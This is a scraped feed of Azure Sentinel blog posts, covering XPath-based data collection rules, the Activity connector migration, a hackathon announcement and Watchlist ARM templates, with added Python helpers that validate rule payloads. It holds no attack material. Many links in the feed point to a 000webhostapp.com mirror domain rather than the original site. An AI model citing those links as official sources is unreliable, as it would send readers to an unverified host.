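                duplicates.append(first_seen[key])
        else:
            first_seen[key] = query
    return duplicates


def validate_data_sources(doc):
    """Return a list of problems; an empty list means the payload passes both checks."""
    problems = []
    entries = doc.get("windowsEventLogs", [])
    if len(entries) > MAX_WINDOWS_EVENT_LOG_ITEMS:
        problems.append(
            f"windowsEventLogs has {len(entries)} items; limit is {MAX_WINDOWS_EVENT_LOG_ITEMS}"
        )
    for index, entry in enumerate(entries):
        duplicates = find_duplicate_xpaths(entry.get("xPathQueries", []))
        if duplicates:
            problems.append(
                f"windowsEventLogs[{index}].xPathQueries has duplicates: "
                + ", ".join(duplicates)
            )
    return problems


def validate_file(path):
    """Load a data-sources file from disk and run the same checks on it."""
    with open(path, encoding="utf-8") as handle:
        return validate_data_sources(json.load(handle))


# Constructed sample: the four queries from the page's fragment plus a copy of
# the 4688 query that differs only in case (entry name and stream are placeholders).
SAMPLE_WITH_DUPLICATE = {
    "windowsEventLogs": [
        {
            "name": "eventLogsDataSource",
            "streams": ["Microsoft-SecurityEvent"],
            "xPathQueries": [
                "Security!*[System[(EventID=4688)]]",
                "Security!*[System[(EventID=4660)]]",
                "Security!*[System[(EventID=4656 or EventID=4661)]]",
                "Security!*[System[(EventID=4670)]]",
                "security!*[System[(EventID=4688)]]",
            ],
        }
    ]
}

# Constructed sample: eleven one-query entries, one more than the limit.
SAMPLE_TOO_MANY = {
    "windowsEventLogs": [
        {
            "name": f"eventLogsDataSource{i}",
            "streams": ["Microsoft-SecurityEvent"],
            "xPathQueries": [f"Security!*[System[(EventID={4600 + i})]]"],
        }
        for i in range(11)
    ]
}

if __name__ == "__main__":
    for label, doc in (("duplicate", SAMPLE_WITH_DUPLICATE), ("too-many", SAMPLE_TOO_MANY)):
        for problem in validate_data_sources(doc) or ["ok"]:
            print(f"{label}: {problem}")
```

Running validate_file("FileExample.json") before invoking the script reproduces both rejections locally instead of waiting for a 400 from the API; the duplicate check uses the same case-insensitive comparison the second error message names.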
Just in case you were wondering how I call the linked template from the main template, I do it this way:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/Win10-DCR-DeploymentScript.json at master · OTRF/Azure-Sentinel2Go (github.com)</A></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_2-1624586850130.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291168i404F0CE22E18FBD6/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_2-1624586850130.png" alt="Cyb3rWard0g_2-1624586850130.png" /></span></P> <P>&nbsp;</P> <H2>How Do I Deploy the New Template?</H2> <P>The same way how we deployed the initial one. If you want the Easy <STRONG>Button</STRONG> , then simply browse to the URL below and click on the blue button highlighted in the image below:</P> <P>&nbsp;</P> <P>Link:&nbsp;<A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/grocery-list/Win10/demos at master · OTRF/Azure-Sentinel2Go (github.com)</A></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_3-1624587103977.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291170i2157EE960113AC9D/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_3-1624587103977.png" alt="Cyb3rWard0g_3-1624587103977.png" /></span></P> <P>&nbsp;</P> <P>Wait 5-10 mins!</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_4-1624587184135.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291171i20D07D5FC684077E/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_4-1624587184135.png" 
alt="Cyb3rWard0g_4-1624587184135.png" /></span></P> <P>&nbsp;</P> <P>Enjoy it!</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_6-1624588013944.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291174i48700DF747FD1EE3/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_6-1624588013944.png" alt="Cyb3rWard0g_6-1624588013944.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">That’s it!&nbsp;You now know two ways to deploy and test the new data connector and <STRONG>Data Collection Rules</STRONG> features with <STRONG>XPath queries capabilities</STRONG>. I hope this was useful.&nbsp;Those were all my notes while testing and developing templates to create a lab environment so that you could also expedite the testing process!</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Feedback is greatly appreciated! Thank you to the <A href="#" target="_self">OSSEM team</A> and the <A href="#" target="_self">Open Threat Research (OTR) community</A> for helping us operationalize the research they share with the community! 
Thank you,&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Jose Rodriguez</SPAN></A><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Demo Links</SPAN></H2> <UL> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/grocery-list/Win10/demos at master · OTRF/Azure-Sentinel2Go (github.com)</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/azure-sentinel/linkedtemplates/data-collection-rules at master · OTRF/Azure-Sentinel2Go (github.com)</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/azure-sentinel/linkedtemplates/data-collection-rules/rules at master · OTRF/Azure-Sentinel2Go (github.com)</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/ossem-attack.json at master · OTRF/Azure-Sentinel2Go (github.com)</A></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><SPAN data-contrast="none">References</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">XPath Tutorial (w3schools.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Configure data collection for 
the Azure Monitor agent (preview) - Azure Monitor | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Collection Rules in Azure Monitor (preview) - Azure Monitor | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Connect Windows security event data to Azure Sentinel (tabbed version) | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Microsoft.Insights/dataCollectionRuleAssociations - ARM template reference | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" 
data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/ask-the-directory-services-team/advanced-xml-filtering-in-the-windows-event-viewer/ba-p/399761" target="_blank" rel="noopener"><SPAN data-contrast="none">Advanced XML filtering in the Windows Event Viewer - Microsoft Tech Community</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Consuming Events (Windows Event Log) - Win32 apps | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Monitor agent overview - Azure Monitor | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-monitor/a-powerful-agent-for-azure-monitor-and-a-simpler-world-of-data/ba-p/2443285" target="_blank" rel="noopener"><SPAN data-contrast="none">A powerful agent for Azure Monitor and a simpler world of data collection; now generally available! 
- Microsoft Tech Community</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Collection Rules - REST API (Azure Monitor) | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Collection Rule Associations - REST API (Azure Monitor) | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">XML Path Language (XPath) (w3.org)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Managed identities for Azure resources | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="44" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN 
data-contrast="none">Configure managed identities using the Azure portal - Azure AD | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> Fri, 25 Jun 2021 03:11:49 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/testing-the-new-version-of-the-windows-security-events-connector/ba-p/2483369 Cyb3rWard0g 2021-06-25T03:11:49Z Moving Azure Activity Connector to an improved method https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/moving-azure-activity-connector-to-an-improved-method/ba-p/2479552 <P>The Activity log is a&nbsp;<A href="#" target="_blank" rel="noopener">platform log</A>&nbsp;in Azure that provides insight into subscription-level events, such as when a resource is modified or when a virtual machine is started. You can view the Activity log in the Azure portal or retrieve entries with PowerShell and the CLI. For additional functionality, create a diagnostic setting to send the Activity log to your Azure Sentinel workspace.</P> <P>&nbsp;</P> <H2><STRONG>What changed?</STRONG></H2> <P>The Azure Activity connector used a legacy method for collecting Activity log events before it adopted the diagnostic settings pipeline. If you're using this legacy method, you are strongly encouraged to upgrade to the new pipeline, which provides better functionality and consistency with resource logs.</P> <P>Diagnostic settings send the same Activity log data as the legacy method, with some changes to the structure of the&nbsp;<EM>AzureActivity</EM>&nbsp;table.</P> <P>The columns in the following table have been deprecated in the updated schema. They still exist in&nbsp;<EM>AzureActivity</EM>&nbsp;but will have no data. The replacement columns are not new, and they contain the same data as the deprecated columns. 
They are in a different format, so if you have any private or internal content (such as hunting queries, analytics rules, workbooks, etc.) based on the deprecated columns, you may need to modify it and make sure that it points to the right columns.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ShaharAviv_0-1624519414672.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/290874i4BEDFD34B9BB10FC/image-size/large?v=v2&amp;px=999" role="button" title="ShaharAviv_0-1624519414672.png" alt="ShaharAviv_0-1624519414672.png" /></span></P> <P>&nbsp;</P> <P>Here are some of the key improvements resulting from the move to the diagnostic settings pipeline:</P> <UL> <LI>Improved ingestion latency (event ingestion within 2-3 minutes of occurrence instead of 15-20 minutes).</LI> <LI>Improved reliability.</LI> <LI>Improved performance.</LI> <LI>Support for all categories of events logged by the Activity log service (the legacy mechanism supports only a subset; for example, it has no support for Service Health events).</LI> <LI>Management at scale with Azure Policy.</LI> <LI>Support for management group (MG) level activity logs (coming in preview now).</LI> </UL> <P>&nbsp;</P> <H2><STRONG>Set up the (new) Azure Activity connector</STRONG></H2> <P>The new Azure Activity connector involves two main steps: <EM>Disconnect</EM> the existing subscriptions from the legacy method, and then <EM>Connect</EM> all the relevant subscriptions to the new diagnostic settings pipeline via Azure Policy.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ShaharAviv_2-1624519414696.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/290876i974B93C7D177A9DD/image-size/large?v=v2&amp;px=999" role="button" title="ShaharAviv_2-1624519414696.png" alt="ShaharAviv_2-1624519414696.png" 
/></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ShaharAviv_3-1624519414706.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/290877iAB79F90203C733BE/image-size/large?v=v2&amp;px=999" role="button" title="ShaharAviv_3-1624519414706.png" alt="ShaharAviv_3-1624519414706.png" /></span></P> <P>&nbsp;</P> <P>Please go to <A href="#" target="_blank" rel="noopener">Connect Azure Activity log data to Azure Sentinel</A> to learn more about the new connector experience.</P> <P>&nbsp;</P> Thu, 24 Jun 2021 11:54:15 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/moving-azure-activity-connector-to-an-improved-method/ba-p/2479552 ShaharAviv 2021-06-24T11:54:15Z Join in the Azure Sentinel Hackathon 2021! https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/join-in-the-azure-sentinel-hackathon-2021/ba-p/2466335 <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Hackathon Banner.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/290300i484677F00D9DC095/image-size/large?v=v2&amp;px=999" role="button" title="Hackathon Banner.png" alt="Hackathon Banner.png" /></span></P> <P>&nbsp;</P> <P>Today, we are announcing the <A href="#" target="_blank" rel="noopener">2<SUP>nd</SUP> annual&nbsp;Hackathon for Azure Sentinel</A>! This hackathon challenges security experts around the globe to build end-to-end cybersecurity solutions for Azure Sentinel that deliver enterprise value by collecting data, managing security, detecting, hunting, investigating, and responding to constantly evolving threats. We invite you to participate in this hackathon for a chance to solve this challenge and win a piece of the $19000 cash prize pool*. 
This online hackathon runs from June 21<SUP>st</SUP> to Oct 4<SUP>th</SUP>, 2021, and is open to individuals, teams, and organizations globally.</P> <P><BR /><A href="#" target="_blank" rel="noopener">Azure Sentinel</A>&nbsp;provides a platform for security analysts and threat hunters of various levels to not only leverage existing content like workbooks (dashboards), playbooks (workflow orchestrations), analytic rules (detections), hunting queries, etc., but also <A href="#" target="_blank" rel="noopener">build custom content and solutions</A>. Furthermore, Azure Sentinel provides <A href="#" target="_blank" rel="noopener">APIs</A> for integrating different types of applications with Azure Sentinel data and insights.&nbsp;Here are a few examples of end-to-end solutions that unlock the potential of Azure Sentinel and drive enterprise value.</P> <UL> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-solutions/ba-p/2347312" target="_blank" rel="noopener">Azure Sentinel Solutions blogpost</A> provides examples of end-to-end solutions that deliver product, domain, and/or industry vertical value.</LI> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-sigma-and-soc-prime-integration-part-1-convert/ba-p/1232903" target="_blank" rel="noopener">SOC Prime Sigma integration</A>&nbsp;provides an example of API integration.</LI> <LI><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-to-go-part1-a-lab-w-prerecorded-data-amp-a-custom/ba-p/1260191" target="_blank" rel="noopener">Azure Sentinel2Go lab</A>&nbsp;with pre-recorded data provides an example of a tool that enables easier onboarding to Azure Sentinel.&nbsp;</LI> </UL> <P>&nbsp;You can discover more examples by reviewing content and solutions in the&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub repo</A>&nbsp;and&nbsp;<A 
href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/bg-p/AzureSentinelBlog" target="_blank" rel="noopener">blogs</A>. You can refer to the last year’s <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/announcing-the-azure-sentinel-hackathon-winners/ba-p/1548240" target="_blank" rel="noopener">Azure Sentinel Hackathon</A> for ideas too!</P> <P>&nbsp;</P> <H1>Prizes</H1> <P>In addition to learning more about Azure Sentinel and delivering cybersecurity value to enterprises, this hackathon offers the following awesome prizes for top projects:</P> <UL> <LI>First Place (1) - $10,000 USD cash prize &nbsp;</LI> <LI>Second Place (1) - $4000 USD cash prize</LI> <LI>Runners Up (2) - $1500 USD cash prize each&nbsp;</LI> <LI>Popular Choice (1) - $1000 USD cash prize</LI> <LI>The first 10 eligible submissions also qualify to receive $100 each.</LI> </UL> <P>Note<EM>: Refer to the </EM><A href="#" target="_blank" rel="noopener"><EM>Hackathon official rules</EM></A><EM> for details on project types that qualify for each prize category</EM></P> <P>In addition, the four winning projects will be heavily promoted on Microsoft blogs and social media so that your creative projects are widely known to all. The criteria for judging consist of quality of the idea, value to enterprise and technical implementation. Refer to the&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel Hackathon website</A>&nbsp;for further details and get started.</P> <P>&nbsp;</P> <H1>Judging Panel</H1> <P>Judging commences immediately after the hackathon submission window closes on October 4<SUP>th</SUP>, 2021. We’ll announce the winners on or before October 27<SUP>th</SUP>, 2021. 
Our judging panel currently includes the following influencers and experts in the cybersecurity community.</P> <UL> <LI>Ann Johnson - Corporate Vice President, Cybersecurity Solutions Group, Microsoft</LI> <LI>Vasu Jakkal - Corporate Vice President, Microsoft Security, Compliance and Identity</LI> <LI>John Lambert - Distinguished Engineer and General Manager, Microsoft Threat Intelligence Center</LI> <LI>Nick Lippis - Co-Founder, Co-Chair ONUG</LI> <LI>Andrii Bezverkhyi - CEO &amp; founder of SOC Prime, inventor of Uncoder.IO</LI> </UL> <P>&nbsp;</P> <H1>&nbsp;Next Steps</H1> <UL> <LI>Start by registering for this hackathon at the&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel Hackathon website</A>&nbsp;and invite your friends to join in the fun!</LI> <LI>Build your project by following the&nbsp;<A href="#" target="_blank" rel="noopener">Get Started guidance</A>. We have Azure credits for eligible participants to help you get started!</LI> <LI>Learn about&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel</A>&nbsp;and explore the&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub</A>&nbsp;for inspiration.</LI> </UL> <P>Let the&nbsp;<STRONG>#AzureSecurityHackathon</STRONG>&nbsp;begin!</P> <P>&nbsp;</P> <P><EM>*No purchase necessary. Open only to new and existing Devpost users who are the age of majority in their country. Game ends October 4<SUP>th</SUP>, 2021 at 9:00 AM Pacific Time. Refer to the&nbsp;</EM><A href="#" target="_blank" rel="noopener"><EM>official rules</EM></A><EM>&nbsp;for details.&nbsp;</EM></P> <P>&nbsp;</P> Mon, 21 Jun 2021 16:20:53 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/join-in-the-azure-sentinel-hackathon-2021/ba-p/2466335 Preeti_Krishna 2021-06-21T16:20:53Z What's New: Azure Sentinel Watchlist Support for ARM Templates! 
https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-watchlist-support-for-arm-templates/ba-p/2424429 <P>To add to the list of exciting announcements for Azure Sentinel, we are happy to announce that Watchlists now support ARM templates! Moving forward, users will be able to deploy Watchlists via ARM templates for quicker deployment scenarios as well as bulk deployments.</P> <P>&nbsp;</P> <P><STRONG>What Does It Look Like?</STRONG></P> <P>&nbsp;</P> <P>The template format is similar to regular ARM templates for Azure Sentinel. The template contains a few variables that are set upon creation and deployment:</P> <P>&nbsp;</P> <DIV> <DIV><SPAN>Workspace&nbsp;Name:&nbsp;The&nbsp;workspace&nbsp;name&nbsp;is&nbsp;required&nbsp;so&nbsp;that&nbsp;ARM&nbsp;knows&nbsp;the&nbsp;workspace&nbsp;that&nbsp;Azure&nbsp;Sentinel&nbsp;is&nbsp;using.&nbsp;This&nbsp;is&nbsp;used&nbsp;for&nbsp;deploying&nbsp;the&nbsp;content&nbsp;and&nbsp;function&nbsp;to&nbsp;the&nbsp;workspace.</SPAN></DIV> <BR /> <DIV><SPAN>Watchlist Name:&nbsp;Name&nbsp;for&nbsp;the&nbsp;Watchlist&nbsp;in&nbsp;both&nbsp;Azure&nbsp;Sentinel&nbsp;and&nbsp;in&nbsp;the&nbsp;workspace&nbsp;when&nbsp;calling&nbsp;it&nbsp;via the _getWatchlist function.&nbsp;This&nbsp;should&nbsp;reflect&nbsp;what&nbsp;the&nbsp;Watchlist&nbsp;is&nbsp;for.</SPAN></DIV> <BR /> <DIV><SPAN>SearchKey&nbsp;Value:&nbsp;Title&nbsp;of&nbsp;a&nbsp;column&nbsp;that&nbsp;will&nbsp;be&nbsp;used&nbsp;for&nbsp;performing&nbsp;lookups&nbsp;and&nbsp;joins&nbsp;with&nbsp;other&nbsp;tables.&nbsp;It&nbsp;is&nbsp;recommended&nbsp;to&nbsp;choose&nbsp;the column&nbsp;that&nbsp;will&nbsp;be&nbsp;the&nbsp;most&nbsp;used&nbsp;for&nbsp;joins&nbsp;and&nbsp;lookups.</SPAN></DIV> <DIV>&nbsp;</DIV> <DIV><SPAN>Watchlist Name and SearchKey should be set when creating the template as this value will be static. The name should reflect the purpose or topic of the Watchlist. The SearchKey is meant to be used as the reference column. 
The purpose of this column is to make lookups and joins more efficient. The section that those variables are set in appears as so (the workspaceName parameter is supplied at deployment):</SPAN></DIV> <DIV>&nbsp;</DIV> <DIV><LI-CODE lang="json">"name": "[concat(parameters('workspaceName'), '/Microsoft.SecurityInsights/PUTWATCHLISTNAMEHERE')]",
"type": "Microsoft.OperationalInsights/workspaces/providers/Watchlists",
"kind": "",
"properties": {
    "displayName": "PUTWATCHLISTNAMEHERE",
    "source": "PUTWATCHLISTNAMEHERE.csv",
    "description": "This is a sample Watchlist description.",
    "provider": "Custom",
    "isDeleted": false,
    "labels": [ ],
    "defaultDuration": "P1000Y",
    "contentType": "Text/Csv",
    "numberOfLinesToSkip": 0,
    "itemsSearchKey": "PUTSEARCHKEYVALUEHERE",</LI-CODE></DIV> <DIV>&nbsp;</DIV> <DIV>Within the body is the content that would normally be found within the CSV file that is uploaded to Azure Sentinel. This data is found under "rawContent".</DIV> <DIV>&nbsp;</DIV> <DIV> <DIV> <DIV><SPAN>For the content of the CSV that will be generated, the columns and values must be specified. The columns appear first, followed by the data. An example appears as so:</SPAN></DIV> </DIV> <DIV><LI-CODE lang="json">"rawContent": "SEARCHKEYCOLUMN,SampleColumn1,SampleColumn2\r\nSamplevalue1,samplevalue2,samplevalue3\r\nsamplevalue4,samplevalue5,samplevalue6\r\n"</LI-CODE><BR /> <DIV><SPAN>The columns that should be used are listed first in this example (SEARCHKEYCOLUMN, SampleColumn1, SampleColumn2). Once the columns are listed, "\r\n" needs to be used to signal that a new row needs to be started. This is used throughout the template. 
This lets ARM know that the row has ended and the next row of the CSV should begin.</SPAN></DIV> <DIV>&nbsp;</DIV> <DIV><SPAN>Note: The column being used for the SearchKey does not always need to be listed first.</SPAN></DIV> <BR /> <DIV><SPAN>When it comes to the values under the columns, each value should be separated by a comma. </SPAN><SPAN>The comma is interpreted as the end of that cell. As shown in the example, samplevalue1 is one cell and samplevalue2 is a different cell. When all of the values have been added for the row, \r\n needs to be used in order to start the next row.</SPAN></DIV> <BR /> <DIV><SPAN>An example of how that might look would be:</SPAN></DIV> <DIV>&nbsp;</DIV> <DIV><LI-CODE lang="json">"rawContent": "SEARCHKEYCOLUMN,Account,Machine\r\n123.456.789.1,Admin,ContosoMachine1\r\n123.456.789.2,LocalUser,ContosoMachine2\r\n"</LI-CODE></DIV> <SPAN>Note: These values are space sensitive. 
If spaces are not needed, please avoid using them as it could lead to inaccurate values.</SPAN></DIV> <DIV><BR /> <DIV><SPAN>This&nbsp;example&nbsp;shows&nbsp;that&nbsp;the&nbsp;columns&nbsp;will be&nbsp;an&nbsp;IP&nbsp;(used&nbsp;as&nbsp;the&nbsp;search&nbsp;key&nbsp;value),&nbsp;an&nbsp;account,&nbsp;and&nbsp;a&nbsp;machine.&nbsp;The&nbsp;rows&nbsp;below&nbsp;the&nbsp;columns&nbsp;will&nbsp;contain&nbsp;those&nbsp;types&nbsp;of&nbsp;values&nbsp;in&nbsp;the&nbsp;CSV&nbsp;file.&nbsp;In this&nbsp;case,&nbsp;the&nbsp;CSV&nbsp;will&nbsp;only&nbsp;have&nbsp;3&nbsp;columns&nbsp;and&nbsp;2&nbsp;rows&nbsp;of&nbsp;data.</SPAN></DIV> <DIV>&nbsp;</DIV> <DIV><STRONG>Use Cases:</STRONG></DIV> <DIV>&nbsp;</DIV> <DIV>ARM template deployments will provide the most value when looking to deploy Watchlists in bulk or along with other items. For example, deploying a Watchlist upon the creation of a custom analytic rule, deploying a Watchlist based on TI posted by Microsoft, and more.</DIV> <DIV>&nbsp;</DIV> <DIV>As an example, an <A href="#" target="_self">ARM template</A> has been posted within the Azure Sentinel GitHub that lists the Azure Public IPs. These IPs can be found online and downloaded but in this case, the IPs are ready to be deployed as a Watchlist for usage. This Watchlist can then be used to lower false positives for detections that pick up the IP or to be used as enrichment data for investigating activities within the environment. Additionally, a <A href="#" target="_self">template</A> that consists of threat intelligence from the Microsoft Threat Intelligence Research Center for the recent NOBELIUM attacks has been posted within the GitHub for usage. This template allows for a file upload of threat intelligence without having to manually type each value into a CSV or the Azure portal.</DIV> <DIV>&nbsp;</DIV> <DIV>To help users get started, a <A href="#" target="_self">Watchlist template example</A> has been posted within GitHub for reference. 
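Because the rawContent string is written by hand, the easiest mistakes are exactly the ones the post warns about: a stray space that becomes part of the stored value, a comma inside a value that splits a cell, a row with the wrong number of cells, or a SearchKey that is not one of the columns. The Python below is an added example (not the Azure Sentinel template nor anything from the Azure Sentinel GitHub) that generates rawContent from a list of rows, rejects those mistakes before deployment, and wraps the result in a resource body shaped like the fragment above. The workspace name is inserted as a literal rather than through the concat() template expression, and the column names, addresses and machine names are constructed samples.

```python
"""Build the rawContent string and a Watchlist resource body for an ARM template.

Added example, not the Azure Sentinel template or project code. The resource
layout mirrors the fragment on the page; the cell checks are an added
pre-flight step based on the page's warnings about spaces and commas.
"""
import json

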